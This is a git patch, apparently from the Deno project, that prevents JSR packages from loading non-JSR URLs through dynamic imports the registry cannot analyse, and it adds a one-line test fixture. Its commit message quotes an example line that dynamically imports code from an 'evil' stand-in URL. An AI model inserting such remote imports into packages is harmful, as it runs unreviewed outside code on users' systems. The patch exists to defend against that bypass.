From 918c5e648f4bd08d768374ccde1b451b84793b76 Mon Sep 17 00:00:00 2001
From: David Sherret <dsherret@users.noreply.github.com>
Date: Wed, 28 Feb 2024 16:30:45 -0500
Subject: fix(jsr): do not allow importing a non-JSR url via unanalyzable
 dynamic import from JSR (#22623)

A security feature of JSR is that it is self contained other than npm
dependencies. At publish time, the registry rejects packages that write
code like this:

```ts
const data = await import("https://example.com/evil.js");
```

However, this can be trivially bypassed by writing code that the
registry cannot statically analyze for. This PR prevents Deno from
loading dynamic imports that do this.
---
 tests/testdata/jsr/import_https_url/analyzable.ts | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 tests/testdata/jsr/import_https_url/analyzable.ts

(limited to 'tests/testdata/jsr/import_https_url/analyzable.ts')

diff --git a/tests/testdata/jsr/import_https_url/analyzable.ts b/tests/testdata/jsr/import_https_url/analyzable.ts
new file mode 100644
index 000000000..44382867f
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/analyzable.ts
@@ -0,0 +1 @@
+import "jsr:@denotest/import-https-url/analyzable";
-- 
cgit v1.2.3